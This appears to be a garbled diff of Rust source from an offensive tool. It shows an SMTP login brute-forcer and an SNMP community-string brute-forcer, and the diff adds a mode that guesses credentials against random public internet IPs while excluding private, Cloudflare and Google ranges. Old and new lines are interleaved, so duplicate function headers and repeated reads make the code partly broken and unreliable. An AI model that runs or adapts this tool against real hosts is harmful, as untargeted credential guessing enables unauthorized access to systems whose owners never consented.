println!("{}", format!("[!] Failed to save unknown responses: {}", e).red());
} else {
println!("{}", format!("[+] Unknown responses saved to {}", chosen).green());
async fn run_smtp_bruteforce(config: SmtpBruteforceConfig) -> Result<()> {
let usernames = load_lines(&config.username_wordlist)?;
let passwords = load_lines(&config.password_wordlist)?;
let total_attempts = if config.full_combo {
usernames.len() * passwords.len()
} else {
std::cmp::max(usernames.len(), passwords.len())
};
println!("[*] Loaded {} usernames, {} passwords", usernames.len(), passwords.len());
println!("[*] Total attempts: {}", total_attempts);
let stats = Arc::new(BruteforceStats::new());
let found_creds = Arc::new(Mutex::new(Vec::new()));
let stop_signal = Arc::new(AtomicBool::new(false));
let _start_time = std::time::Instant::now();
// Start progress reporter
let stats_clone = stats.clone();
let stop_clone = stop_signal.clone();
let progress_handle = tokio::spawn(async move {
while !stop_clone.load(Ordering::Relaxed) {
tokio::time::sleep(Duration::from_secs(2)).await;
stats_clone.print_progress();
}
});
let semaphore = Arc::new(Semaphore::new(config.threads));
let mut tasks = FuturesUnordered::new();
// Generate combinations
let mut combos = Vec::new();
if config.full_combo {
for u in &usernames {
for p in &passwords {
combos.push((u.clone(), p.clone()));
}
}
} else {
let max_len = std::cmp::max(usernames.len(), passwords.len());
for i in 0..max_len {
let u = &usernames[i % usernames.len()];
let p = &passwords[i % passwords.len()];
combos.push((u.clone(), p.clone()));
}
}
// Process combinations
for (user, pass) in combos {
if config.stop_on_success && stop_signal.load(Ordering::Relaxed) {
break;
}
let permit = semaphore.clone().acquire_owned().await?;
let config_clone = config.clone();
let stats_clone = stats.clone();
let found_clone = found_creds.clone();
let stop_signal_clone = stop_signal.clone();
let user_clone = user.clone();
let pass_clone = pass.clone();
tasks.push(tokio::spawn(async move {
let _permit = permit;
if config_clone.stop_on_success && stop_signal_clone.load(Ordering::Relaxed) {
return;
}
// Wrap blocking logic
let config_inner = config_clone.clone();
let user_inner = user_clone.clone();
let pass_inner = pass_clone.clone();
let res = tokio::task::spawn_blocking(move || {
match try_smtp_login(&config_inner.target, config_inner.port, &user_inner, &pass_inner) {
Ok(true) => Ok(true),
Ok(false) => Ok(false),
Err(e) => Err(e),
}
}).await;
match res {
Ok(Ok(true)) => {
println!("\r{}", format!("[+] Found: {}:{}", user_clone, pass_clone).green().bold());
found_clone.lock().await.push((user_clone.clone(), pass_clone.clone()));
stats_clone.record_success();
if config_clone.stop_on_success {
stop_signal_clone.store(true, Ordering::Relaxed);
}
},
Ok(Ok(false)) => {
stats_clone.record_failure();
if config_clone.verbose {
println!("\r{}", format!("[-] Failed: {}:{}", user_clone, pass_clone).dimmed());
}
},
Ok(Err(e)) => {
stats_clone.record_error(e.to_string()).await;
if config_clone.verbose {
println!("\r{}", format!("[!] Error {}:{}: {}", user_clone, pass_clone, e).red());
}
},
Err(e) => {
stats_clone.record_error(format!("Task panic: {}", e)).await;
}
}
if config_clone.delay_ms > 0 {
tokio::time::sleep(Duration::from_millis(config_clone.delay_ms)).await;
}
}));
// Memory management: drain completed tasks
while let std::task::Poll::Ready(Some(_)) = futures::future::poll_fn(|cx| std::task::Poll::Ready(tasks.poll_next_unpin(cx))).await {}
}
while let Some(_) = tasks.next().await {}
stop_signal.store(true, Ordering::Relaxed);
let _ = progress_handle.await;
stats.print_final().await;
// Save results
let found = found_creds.lock().await;
if !found.is_empty() {
if let Ok(mut file) = std::fs::OpenOptions::new().create(true).append(true).open(&config.output_file) {
use std::io::Write;
for (u, p) in found.iter() {
let _ = writeln!(file, "{}:{}", u, p);
}
println!("[+] Results saved to {}", config.output_file);
}
}
Ok(())
}
/// Try login with both AUTH PLAIN and AUTH LOGIN, returns Ok(true) if success, Ok(false) if auth fail, Err on connection/protocol error.
fn try_smtp_login(addr: &str, username: &str, password: &str) -> Result<bool> {
use base64::{engine::general_purpose, Engine as _};
let socket = addr.to_socket_addrs()?.next().ok_or_else(|| anyhow::anyhow!("Could not resolve address"))?;
let stream = TcpStream::connect_timeout(&socket, Duration::from_millis(1500)).context("Connect timeout")?;
stream.set_read_timeout(Some(Duration::from_millis(1500))).ok();
stream.set_write_timeout(Some(Duration::from_millis(1500))).ok();
let mut telnet = Telnet::from_stream(Box::new(stream), 256);
fn try_smtp_login(target: &str, port: u16, username: &str, password: &str) -> Result<bool> {
let addr = format!("{}:{}", target, port);
let socket = addr.to_socket_addrs()?.next().ok_or_else(|| anyhow!("Resolution failed"))?;
let stream = TcpStream::connect_timeout(&socket, Duration::from_millis(2000))?;
stream.set_read_timeout(Some(Duration::from_millis(2000)))?;
stream.set_write_timeout(Some(Duration::from_millis(2000)))?;
let mut telnet = Telnet::from_stream(Box::new(stream), 512);
let mut banner_ok = false;
for _ in 0..3 {
let event = telnet.read().context("Banner read error")?;
let event = telnet.read().context("Banner read")?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
if s.starts_with("220") { banner_ok = true; break; }
}
}
if !banner_ok { return Err(anyhow::anyhow!("No 220 banner")); }
if !banner_ok { return Err(anyhow!("No 220 banner")); }
telnet.write(b"EHLO scanner\r\n")?;
let mut login_ok = false;
let mut plain_ok = false;
let mut ehlo_seen = false;
let mut buf = String::new();
for _ in 0..6 {
let event = telnet.read()?;
let event = telnet.read().context("EHLO read")?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
buf.push_str(&s);
if s.contains("AUTH") && s.contains("PLAIN") { plain_ok = true; }
if s.contains("AUTH") && s.contains("LOGIN") { login_ok = true; }
if s.starts_with("250 ") { ehlo_seen = true; break; }
}
}
if !ehlo_seen { return Ok(false); }
// Try AUTH PLAIN
if plain_ok {
let mut blob = vec![0];
blob.extend(username.as_bytes()); blob.push(0); blob.extend(password.as_bytes());
let cmd = format!("AUTH PLAIN {}\r\n", general_purpose::STANDARD.encode(&blob));
telnet.write(cmd.as_bytes())?;
for _ in 0..2 {
let event = telnet.read()?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
if s.starts_with("235") { telnet.write(b"QUIT\r\n").ok(); return Ok(true); }
if s.starts_with("535") || s.starts_with("5") { break; }
}
let event = telnet.read().context("Auth response")?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
if s.starts_with("235") { telnet.write(b"QUIT\r\n").ok(); return Ok(true); }
if s.starts_with("535") || s.starts_with("5") { return Ok(false); }
}
}
}
// Try AUTH LOGIN
if login_ok {
telnet.write(b"AUTH LOGIN\r\n")?;
let mut expect_user = false;
// Wait for username prompt (334)
for _ in 0..2 {
let event = telnet.read()?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
if s.starts_with("334") { expect_user = true; break; }
}
let event = telnet.read().context("Auth Login prompt")?;
if let Event::Data(b) = event {
if String::from_utf8_lossy(&b).starts_with("334") { break; }
}
}
if !expect_user { return Ok(false); }
let ucmd = format!("{}\r\n", general_purpose::STANDARD.encode(username.as_bytes()));
telnet.write(ucmd.as_bytes())?;
let mut expect_pass = false;
for _ in 0..2 {
let event = telnet.read()?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
if s.starts_with("334") { expect_pass = true; break; }
}
// Wait for password prompt (334)
for _ in 0..2 {
let event = telnet.read().context("Auth Pass prompt")?;
if let Event::Data(b) = event {
if String::from_utf8_lossy(&b).starts_with("334") { break; }
}
}
if !expect_pass { return Ok(false); }
let pcmd = format!("{}\r\n", general_purpose::STANDARD.encode(password.as_bytes()));
telnet.write(pcmd.as_bytes())?;
for _ in 0..2 {
let event = telnet.read()?;
let event = telnet.read().context("Auth final response")?;
if let Event::Data(b) = event {
let s = String::from_utf8_lossy(&b);
if s.starts_with("235") { telnet.write(b"QUIT\r\n").ok(); return Ok(true); }
if s.starts_with("535") || s.starts_with("5") { break; }
if s.starts_with("235") { telnet.write(b"QUIT\r\n").ok(); return Ok(true); }
if s.starts_with("535") || s.starts_with("5") { return Ok(false); }
}
}
}
Ok(false)
}
fn read_lines(path: &str) -> Result<Vec<String>> {
let file = File::open(path).context(format!("Open: {}", path))?;
Ok(BufReader::new(file).lines().filter_map(Result::ok).filter(|s|!s.trim().is_empty()).collect())
}
fn save_results(path: &str, creds: &[(String, String)]) -> Result<()> {
let mut file = OpenOptions::new().create(true).write(true).truncate(true).open(path)?;
for (u,p) in creds { writeln!(file, "{}:{}", u, p)?; }
Ok(())
}
fn save_unknown_smtp(path: &str, entries: &[(String, String, String)]) -> Result<()> {
let mut file = OpenOptions::new()
.create(true)
.write(true)
.truncate(true)
.open(path)?;
writeln!(file, "# SMTP Bruteforce Unknown/Errored Responses")?;
writeln!(file, "# Format: username:password - error/response")?;
writeln!(file)?;
for (user, pass, msg) in entries {
writeln!(file, "{}:{} - {}", user, pass, msg)?;
}
Ok(())
}
async fn prompt(msg: &str) -> Result<String> {
print!("{}", msg);
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut b = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut b)
.await
.context("Failed to read input")?;
Ok(b.trim().to_string())
}
async fn prompt_port(default: u16) -> Result<u16> {
loop {
let input = prompt(&format!("Port (default {}): ", default)).await?;
if input.is_empty() {
return Ok(default);
}
match input.parse::<u16>() {
Ok(0) => println!("[!] Port cannot be zero. Please enter a value between 1 and 65535."),
Ok(port) => return Ok(port),
Err(_) => println!("[!] Invalid port. Please enter a number between 1 and 65535."),
}
}
}
async fn prompt_threads(default: usize) -> Result<usize> {
loop {
let input = prompt(&format!("Threads (default {}): ", default)).await?;
if input.is_empty() {
return Ok(default.max(1));
}
if let Ok(value) = input.parse::<usize>() {
if value >= 1 && value <= 1024 {
return Ok(value);
}
}
println!("[!] Invalid thread count. Please enter a value between 1 and 1024.");
}
}
async fn prompt_yes_no(message: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
let input = prompt(&format!("{} (y/n) [{}]: ", message, default_char)).await?;
if input.is_empty() {
return Ok(default_yes);
}
match input.to_lowercase().as_str() {
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("[!] Please respond with y or n."),
}
}
}
async fn prompt_wordlist(message: &str) -> Result<String> {
loop {
let response = prompt(message).await?;
if response.is_empty() {
println!("[!] Path cannot be empty.");
continue;
}
let trimmed = response.trim();
if Path::new(trimmed).is_file() {
return Ok(trimmed.to_string());
} else {
println!(
"{}",
format!("File '{}' does not exist or is not a regular file.", trimmed).yellow()
);
}
}
}
fn normalize_target(host: &str, port: u16) -> Result<String> {
let re = Regex::new(r"^\[*([^\]]+?)\]*(?::(\d{1,5}))?$" ).unwrap();
let t = host.trim();
let cap = re.captures(t).ok_or_else(|| anyhow::anyhow!("Invalid target: {}", host))?;
let addr = cap.get(1).unwrap().as_str();
let p = cap.get(2).map(|m| m.as_str().parse::<u16>().ok()).flatten().unwrap_or(port);
let f = if addr.contains(':') && !addr.starts_with('[') { format!("[{}]:{}", addr, p) } else { format!("{}:{}", addr, p) };
if f.to_socket_addrs()?.next().is_none() { Err(anyhow::anyhow!("DNS fail: {}", f)) } else { Ok(f) }
}
+233 -296
View File
@@ -1,187 +1,102 @@
use anyhow::{anyhow, Context, Result};
use anyhow::{anyhow, Result, Context};
use colored::*;
use futures::stream::{FuturesUnordered, StreamExt};
use std::{
fs::File,
io::{BufRead, BufReader, Write},
net::{SocketAddr, UdpSocket},
path::{Path, PathBuf},
io::Write,
net::{SocketAddr, UdpSocket, IpAddr},
sync::Arc,
sync::atomic::{AtomicBool, AtomicUsize, Ordering},
time::{Duration, Instant},
};
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use regex::Regex;
use tokio::{
io::{AsyncBufReadExt, AsyncWriteExt},
sync::Mutex,
sync::Semaphore,
task::spawn_blocking,
time::sleep,
fs::OpenOptions,
io::AsyncWriteExt,
};
use crate::utils::{
prompt_yes_no, prompt_existing_file, prompt_int_range,
load_lines, prompt_default, normalize_target,
};
use crate::modules::creds::utils::{BruteforceStats, generate_random_public_ip, is_ip_checked, mark_ip_checked, parse_exclusions};
const PROGRESS_INTERVAL_SECS: u64 = 2;
const STATE_FILE: &str = "snmp_hose_state.log";
struct Statistics {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
start_time: Instant,
}
impl Statistics {
fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
start_time: Instant::now(),
}
}
fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
}
}
fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Valid communities: {}", success.to_string().green().bold());
println!(" Invalid: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
}
}
}
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ SNMPv1/v2c Brute Force Module ║".cyan());
println!("{}", "║ Community String Discovery Tool ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!();
}
// Hardcoded exclusions (Private + Cloudflare + Google + Link Local etc)
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
// Cloudflare
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32",
// Google
"8.8.8.8/32", "8.8.4.4/32"
];
pub async fn run(target: &str) -> Result<()> {
display_banner();
println!("\n{}", "=== SNMPv1/v2c Brute Force Module ===".bold().cyan());
println!("{}", " Community String Discovery Tool".cyan());
println!();
println!("{}", format!("[*] Target: {}", target).cyan());
let port: u16 = loop {
let input = prompt_default("SNMP Port", "161").await?;
match input.trim().parse::<u16>() {
Ok(p) if p > 0 => break p,
Ok(_) => println!("{}", "Port must be between 1 and 65535.".yellow()),
Err(_) => println!("{}", "Invalid port number. Please enter a number between 1 and 65535.".yellow()),
}
};
// Check for Mass Scan Mode
let is_mass_scan = target == "random" || target == "0.0.0.0"
|| target == "0.0.0.0/0" || std::path::Path::new(target).is_file();
let communities_file = loop {
let input = prompt_required("Community string wordlist file path").await?;
let path = Path::new(&input);
if !path.exists() {
println!("{}", format!("File '{}' does not exist.", input).yellow());
println!("{}", "Tip: Common SNMP community wordlists are at /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt".yellow());
continue;
}
if !path.is_file() {
println!("{}", format!("'{}' is not a regular file.", input).yellow());
continue;
}
// Check if file is readable
match File::open(path) {
Ok(_) => break input,
Err(e) => {
println!("{}", format!("Cannot read file '{}': {}", input, e).yellow());
continue;
}
}
};
if is_mass_scan {
println!("{}", "[*] Mode: Mass Scan / Hose".yellow());
return run_mass_scan(target).await;
}
// --- Standard Single-Target Logic ---
let default_port = 161;
let port = prompt_int_range("SNMP Port", default_port as i64, 1, 65535)? as u16;
let communities_file = prompt_existing_file("Community string wordlist file path")?;
// Custom prompt for version since it's specific
let snmp_version = loop {
let input = prompt_default("SNMP Version (1 or 2c)", "2c").await?;
let input = prompt_default("SNMP Version (1 or 2c)", "2c")?;
match input.trim().to_lowercase().as_str() {
"1" => break 0, // SNMPv1
"2c" | "2" => break 1, // SNMPv2c
_ => println!("Invalid version. Enter '1' or '2c'."),
}
};
let concurrency = prompt_int_range("Max concurrent tasks", 50, 1, 1000)? as usize;
let stop_on_success = prompt_yes_no("Stop on first success?", true)?;
// Output file handled by saving results at the end usually, but old code asked upfront.
// I'll stick to standard flow: prompt for save at end OR automatically if specified.
// Existing modules prompted for output file upfront. I'll do that for consistency with new standard.
let output_file = prompt_default("Output file", "snmp_results.txt")?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let timeout_secs = prompt_int_range("Timeout (seconds)", 3, 1, 300)? as u64;
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "50").await?;
match input.trim().parse::<usize>() {
Ok(n) if n > 0 && n <= 10000 => break n,
Ok(n) if n == 0 => println!("{}", "Concurrency must be greater than 0.".yellow()),
Ok(_) => println!("{}", "Concurrency must be between 1 and 10000.".yellow()),
Err(_) => println!("{}", "Invalid number. Please enter a positive integer.".yellow()),
}
};
let stop_on_success = prompt_yes_no("Stop on first success?", true).await?;
let save_results = prompt_yes_no("Save results to file?", true).await?;
let save_path = if save_results {
Some(prompt_default("Output file", "snmp_brute_results.txt").await?)
} else {
None
};
let verbose = prompt_yes_no("Verbose mode?", false).await?;
let timeout_secs: u64 = loop {
let input = prompt_default("Timeout (seconds)", "3").await?;
match input.trim().parse::<u64>() {
Ok(n) if n > 0 && n <= 300 => break n,
Ok(n) if n == 0 => println!("{}", "Timeout must be greater than 0.".yellow()),
Ok(_) => println!("{}", "Timeout must be between 1 and 300 seconds.".yellow()),
Err(_) => println!("{}", "Invalid timeout. Please enter a number between 1 and 300.".yellow()),
}
};
let connect_addr = normalize_target(target, port)?;
let connect_addr = format!("{}:{}", normalize_target(target)?, port);
let found = Arc::new(Mutex::new(Vec::new()));
let stop = Arc::new(AtomicBool::new(false));
let stats = Arc::new(Statistics::new());
let stats = Arc::new(BruteforceStats::new());
println!("\n[*] Starting SNMP brute-force on {}", connect_addr);
println!("[*] SNMP Version: {}", if snmp_version == 0 { "v1" } else { "v2c" });
let communities = load_lines(&communities_file)?;
if communities.is_empty() {
println!("[!] Community wordlist is empty or invalid. Exiting.");
println!("[!] Community wordlist is empty. Exiting.");
return Ok(());
}
println!("{}", format!("[*] Loaded {} community strings", communities.len()).cyan());
@@ -190,24 +105,27 @@ pub async fn run(target: &str) -> Result<()> {
// Start progress reporter
let stats_clone = stats.clone();
let stop_clone = stop.clone();
let _start_time = Instant::now();
let progress_handle = tokio::spawn(async move {
loop {
if stop_clone.load(Ordering::Relaxed) {
break;
}
stats_clone.print_progress();
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
stats_clone.print_progress();
}
});
let communities = Arc::new(communities);
let mut tasks: FuturesUnordered<_> = FuturesUnordered::new();
let mut tasks = FuturesUnordered::new();
let semaphore = Arc::new(Semaphore::new(concurrency));
for community in communities.iter() {
if stop_on_success && stop.load(Ordering::Relaxed) {
break;
}
let permit = semaphore.clone().acquire_owned().await?;
let addr_clone = connect_addr.clone();
let community_clone = community.clone();
let found_clone = Arc::clone(&found);
@@ -219,6 +137,8 @@ pub async fn run(target: &str) -> Result<()> {
let timeout = Duration::from_secs(timeout_secs);
tasks.push(tokio::spawn(async move {
let _permit = permit;
if stop_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
@@ -230,19 +150,19 @@ pub async fn run(target: &str) -> Result<()> {
.lock()
.await
.push((addr_clone.clone(), community_clone.clone()));
stats_clone.record_attempt(true, false);
stats_clone.record_success();
if stop_flag {
stop_clone.store(true, Ordering::Relaxed);
}
}
Ok(false) => {
stats_clone.record_attempt(false, false);
stats_clone.record_failure();
if verbose_flag {
println!("\r{}", format!("[-] {} -> community: '{}'", addr_clone, community_clone).dimmed());
}
}
Err(e) => {
stats_clone.record_attempt(false, true);
stats_clone.record_error(e.to_string()).await;
if verbose_flag {
println!("\r{}", format!("[!] {}: error: {}", addr_clone, e).red());
}
@@ -251,47 +171,32 @@ pub async fn run(target: &str) -> Result<()> {
sleep(Duration::from_millis(10)).await;
}));
if tasks.len() >= concurrency {
if let Some(res) = tasks.next().await {
if let Err(e) = res {
log(verbose, &format!("[!] Task join error: {}", e));
}
}
}
// Drain
while let std::task::Poll::Ready(Some(_)) = futures::future::poll_fn(|cx| std::task::Poll::Ready(tasks.poll_next_unpin(cx))).await {}
}
while let Some(res) = tasks.next().await {
if let Err(e) = res {
if verbose {
println!("\r{}", format!("[!] Task join error: {}", e).red());
}
}
}
while let Some(_) = tasks.next().await {}
// Stop progress reporter
stop.store(true, Ordering::Relaxed);
let _ = progress_handle.await;
// Print final statistics
stats.print_final();
stats.print_final().await;
let creds = found.lock().await;
if creds.is_empty() {
println!("{}", "[-] No valid community strings found.".yellow());
} else {
println!("{}", format!("[+] Found {} valid community string(s):", creds.len()).green().bold());
for (host, community) in creds.iter() {
println!(" {} -> community: '{}'", host, community);
}
if let Some(path_str) = save_path {
let filename = get_filename_in_current_dir(&path_str);
let mut file = File::create(&filename)?;
if let Ok(mut file) = std::fs::OpenOptions::new().create(true).append(true).open(&output_file) {
for (host, community) in creds.iter() {
writeln!(file, "{} -> community: '{}'", host, community)?;
println!(" {} -> community: '{}'", host, community);
let _ = writeln!(file, "{} -> community: '{}'", host, community);
}
println!("[+] Results saved to '{}'", filename.display());
println!("[+] Results saved to '{}'", output_file);
}
}
@@ -654,126 +559,158 @@ fn encode_sub_id(mut value: u32, output: &mut Vec<u8>) {
}
fn normalize_target(host: &str, default_port: u16) -> Result<String> {
let re = Regex::new(r"^\[*(?P<addr>[^\]]+?)\]*(?::(?P<port>\d{1,5}))?$").unwrap();
let trimmed = host.trim();
let caps = re
.captures(trimmed)
.ok_or_else(|| anyhow!("Invalid target format: {}", host))?;
let addr = caps.name("addr").unwrap().as_str();
let port = if let Some(m) = caps.name("port") {
m.as_str()
.parse::<u16>()
.map_err(|_| anyhow!("Invalid port value in target '{}'", host))?
} else {
default_port
};
let formatted = if addr.contains(':') && !addr.contains('.') {
format!("[{}]:{}", addr, port)
} else {
format!("{}:{}", addr, port)
};
// Validate that the address can be resolved
formatted
.parse::<std::net::SocketAddr>()
.map_err(|e| anyhow!("Could not parse address '{}': {}", formatted, e))?;
Ok(formatted)
}
async fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
} else {
println!("{}", "This field is required.".yellow());
}
}
}
async fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() {
default.to_string()
} else {
trimmed.to_string()
})
}
async fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let input = s.trim().to_lowercase();
if input.is_empty() {
return Ok(default_yes);
} else if input == "y" || input == "yes" {
return Ok(true);
} else if input == "n" || input == "no" {
return Ok(false);
} else {
println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow());
}
}
}
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path.as_ref())
.map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(Result::ok)
.filter(|l| !l.trim().is_empty())
.collect())
}
fn log(verbose: bool, msg: &str) {
if verbose {
println!("{}", msg);
}
}
fn get_filename_in_current_dir(input_path_str: &str) -> PathBuf {
let path_candidate = Path::new(input_path_str)
.file_name()
.map(|os_str| os_str.to_string_lossy())
.filter(|s_cow| !s_cow.is_empty() && s_cow != "." && s_cow != "..")
.map(|s_cow| s_cow.into_owned())
.unwrap_or_else(|| "snmp_brute_results.txt".to_string());
/// Run mass scan logic (Hose style)
async fn run_mass_scan(target: &str) -> Result<()> {
println!("{}", "[*] Preparing Mass Scan configuration...".blue());
PathBuf::from(format!("./{}", path_candidate))
let port = prompt_int_range("SNMP Port", 161, 1, 65535)? as u16;
let communities_file = prompt_existing_file("Community string wordlist")?;
let snmp_version = loop {
let input = prompt_default("SNMP Version (1 or 2c)", "2c")?;
match input.trim().to_lowercase().as_str() {
"1" => break 0,
"2c" | "2" => break 1,
_ => println!("Invalid version. Enter '1' or '2c'."),
}
};
let communities = load_lines(&communities_file)?;
if communities.is_empty() {
return Err(anyhow!("Community wordlist cannot be empty"));
}
let concurrency = prompt_int_range("Max concurrent hosts to scan", 500, 1, 10000)? as usize;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let timeout_secs = prompt_int_range("Timeout (seconds)", 3, 1, 300)? as u64;
let output_file = prompt_default("Output result file", "snmp_mass_results.txt")?;
// Parse exclusions
let exclusions = Arc::new(parse_exclusions(EXCLUDED_RANGES));
// Shared State
let semaphore = Arc::new(Semaphore::new(concurrency));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_found = Arc::new(AtomicUsize::new(0));
let creds_pkg = Arc::new((communities, snmp_version, timeout_secs));
// Stats Reporter
let s_checked = stats_checked.clone();
let s_found = stats_found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(5)).await;
println!(
"[*] Status: {} IPs scanned, {} SNMP devices found",
s_checked.load(Ordering::Relaxed),
s_found.load(Ordering::Relaxed).to_string().green().bold()
);
}
});
let run_random = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0";
if run_random {
println!("{}", "[*] Starting Random Internet Scan...".green());
loop {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let exc = exclusions.clone();
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
if !is_ip_checked(&ip, STATE_FILE).await {
mark_ip_checked(&ip, STATE_FILE).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
} else {
// File mode
let content = tokio::fs::read_to_string(target).await.unwrap_or_default();
let lines: Vec<String> = content.lines().map(|s| s.trim().to_string()).filter(|s| !s.is_empty()).collect();
println!("{}", format!("[*] Loaded {} targets from file.", lines.len()).blue());
for ip_str in lines {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
let ip_addr = match ip_str.parse::<IpAddr>() {
Ok(ip) => Some(ip),
Err(_) => None
};
tokio::spawn(async move {
if let Some(ip) = ip_addr {
if !is_ip_checked(&ip, STATE_FILE).await {
mark_ip_checked(&ip, STATE_FILE).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
// Wait for finish
for _ in 0..concurrency {
let _ = semaphore.acquire().await.context("Semaphore acquisition failed")?;
}
}
Ok(())
}
async fn mass_scan_host(
ip: IpAddr,
port: u16,
creds: Arc<(Vec<String>, u8, u64)>,
stats_found: Arc<AtomicUsize>,
output_file: String,
_verbose: bool,
) {
let addr = format!("{}:{}", ip, port);
let (communities, version, timeout_secs) = &*creds;
let timeout = Duration::from_secs(*timeout_secs);
for community in communities {
match try_snmp_community(&addr, community, *version, timeout).await {
Ok(true) => {
let result_str = format!("{} -> community: '{}'", addr, community);
println!("\\r{}", format!("[+] FOUND: {}", result_str).green().bold());
if let Ok(mut file) = OpenOptions::new()
.create(true)
.append(true)
.open(&output_file)
.await
{
let _ = file.write_all(format!("{}\\n", result_str).as_bytes()).await;
}
stats_found.fetch_add(1, Ordering::Relaxed);
return; // Stop on first valid community for this host
}
Ok(false) => {
// Auth failure
}
Err(_) => {
// Connection error
return;
}
}
}
}
+56 -259
View File
@@ -1,25 +1,25 @@
use anyhow::{anyhow, Context, Result};
use anyhow::{anyhow, Result};
use colored::*;
use ssh2::Session;
use std::{
collections::HashSet,
fs::File,
io::{BufRead, BufReader, Write},
net::{TcpStream, ToSocketAddrs},
path::{Path, PathBuf},
sync::{
atomic::{AtomicBool, AtomicU64, Ordering},
Arc,
},
time::Instant,
